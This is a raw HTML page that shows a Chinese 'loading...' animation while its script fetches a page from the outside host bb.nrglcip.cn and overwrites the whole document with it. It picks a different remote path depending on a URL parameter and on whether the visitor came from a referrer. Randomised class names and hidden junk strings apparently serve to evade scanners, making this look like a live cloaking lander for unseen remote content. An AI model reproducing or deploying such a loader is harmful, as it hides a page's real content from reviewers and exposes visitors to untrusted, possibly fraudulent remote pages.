<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IDHWoRf6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IDHWoRf6 .tX9kmaB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IDHWoRf6 .content {
            line-height: 50px;
            text-align: center
        }

        .IDHWoRf6 .img {
            width: 100%
        }

        .IDHWoRf6 .NVn2Bg {
            text-align: center
        }

        .IDHWoRf6 .NVn2Bg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IDHWoRf6 .NVn2Bg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IDHWoRf6 .NVn2Bg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IDHWoRf6 .NVn2Bg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IDHWoRf6 .NVn2Bg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IDHWoRf6 .NVn2Bg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IDHWoRf6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KDFYceue8JQy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JtpkZ8 = KDFYceue8JQy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JtpkZ8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JtpkZ8 +".html?a=share";
		}
		
        KoX2aYErw=url+"#"+new Date().getTime();
        KoX2aYErw && function() {
            $.get(KoX2aYErw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>dP7Egl84nEblw8Xbj</span>
<a  href='#' style='display:none'>ic9FyHQ7an2ITmsdmiEZdg</a>
<ul style='display:none' >lQhHfnb7fw1vRispL9VKU5mlIEx8DgRSnktn6kxTTzWJsSQR4qwKRnIA1UliBHSYRccd91M8ROzWg7LYXO6A</ul>
<ul style='display:none' >lQhHfnb7fw1vRispL9VKU5mlIEx8DgRSnktn6kxTTzWJsSQR4qwKRnIA1UliBHSYRccd91M8ROzWg7LYXO6A</ul><div class="IDHWoRf6">
    <div class="tX9kmaB">
        <div class="NVn2Bg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>WwvTALlkqfNz7RPKG7mN810NJIatWood1pU68bulmtXVcAcMgBP</a>
<b style='display:none' >QKrrrwsiadoq90ZOjkEWxxmtqWN0I04lNaGgUDo7ULcOCEMFZnCvmKMT9iQl8GHL4Zgy8zJrNz4MRWNzTXSmF</b>
<p  style='display:none'>cHfKWkeS851eo1m6UGjKqPXmsrT2gVs</p>
<span style='display:none'>vsgi7vqXAQreXrihWl1P15hhXaNZ0yT13au94KffU4lPCocyc2Tgv</span>
<h1 style='display:none' >hOyg0sEz3Ecb0tktlZ2nB9kK0A6E3qSEoVSpKqP5VAekAWArOaNA6ojVDsu3utj5IiXbMHNbWMMr2TWjy5MVCh3</h1>
<p  style='display:none'>cHfKWkeS851eo1m6UGjKqPXmsrT2gVs</p>
<ul style='display:none' >J0YS5Hj6Z2PnnxRS1qwQ4YHNK</ul>
<img  src='' style='display:none'>
<ul style='display:none' >J0YS5Hj6Z2PnnxRS1qwQ4YHNK</ul>
<img  src='' style='display:none'></body>
</html>